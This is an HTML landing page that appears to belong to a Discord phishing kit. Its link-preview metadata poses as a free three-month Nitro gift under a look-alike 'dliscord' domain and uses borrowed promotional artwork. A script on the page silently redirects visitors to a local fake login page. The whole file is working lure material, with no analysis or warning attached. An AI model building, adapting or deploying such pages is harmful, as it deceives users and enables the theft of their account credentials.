<html>
    <head>
    <meta property="og:site_name" content="Discord Gift">
    <meta property="og:url" content="https://dliscord.">
    <meta property="og:title" content="Discord">
    <meta property="og:description" content="You Have Been Gifted A 3 Month Nitro">
    <meta property="og:type" content="Discord">
    <meta name="og:image" itemprop="image" content="https://cdn1.epicgames.com/salesEvent/salesEvent/EGS_Discord_Nitro_2560x1440_withlogo_2560x1440-944994658df3b04d0c4940be832da19e">
    </head>
    <body>
        <script>
            window.location.replace("login/index.html");
        </script>
    </body>
</html>

